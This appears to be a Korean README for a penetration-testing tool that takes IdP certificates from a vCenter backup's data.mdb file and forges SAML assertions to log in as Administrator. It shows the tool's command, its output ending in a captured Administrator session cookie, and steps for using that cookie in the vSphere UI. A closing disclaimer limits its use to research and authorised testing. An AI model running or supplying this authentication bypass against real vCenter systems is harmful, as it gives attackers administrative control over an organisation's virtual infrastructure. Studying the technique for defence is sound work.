
vCenter 백업에서 IdP 인증서를 추출하고 Administrator로 로그인하는 도구
vCenter 백업에서 IdP(Identity Provider) 인증서를 추출하고 Administrator로 로그인하기 위한 도구
일반적으로 엔지니어링 진행 중 파일 서버에 있는 vCenter 백업에 접근하거나 최근 CVE를 통해 VCSA 호스트의 root 권한을 획득하게 됩니다. vCenter vSphere UI에 로그인하면 더 많은 시스템과 기밀 정보에 쉽게 접근할 수 있을 뿐만 아니라 고객에게 이러한 발견의 영향을 보여줄 수 있습니다.
data.mdb 파일에는 인증서가 포함되어 있으며 vCenter 백업 내부와 root 권한이 있는 VCSA 호스트에서 찾을 수 있습니다. 이러한 인증서는 평문으로 저장되며 기본 제공 Administrator를 포함한 모든 사용자의 SAML 인증 요청에 서명하는 데 사용될 수 있습니다.
이 도구의 여러 사용 사례와 vCenter 호스트에 대한 관리자 액세스 권한을 획득하기 위해 이를 사용한 방법에 대해 자세히 알아보려면 블로그 게시물을 확인하세요: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640
위 쿠키를 사용하여 https://<VCSA>/ui 에서 VCSA 인스턴스에 접속하고 /ui 경로 아래에 쿠키를 추가한 다음 https://<VCSA>/ui 로 다시 이동하세요.

이 소프트웨어는 학술 연구와 효과적인 방어 기술 개발을 목적으로만 제작되었으며, 명시적으로 승인된 경우를 제외하고 시스템을 공격하는 데 사용하기 위한 것이 아닙니다. 프로젝트 유지 관리자는 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하세요.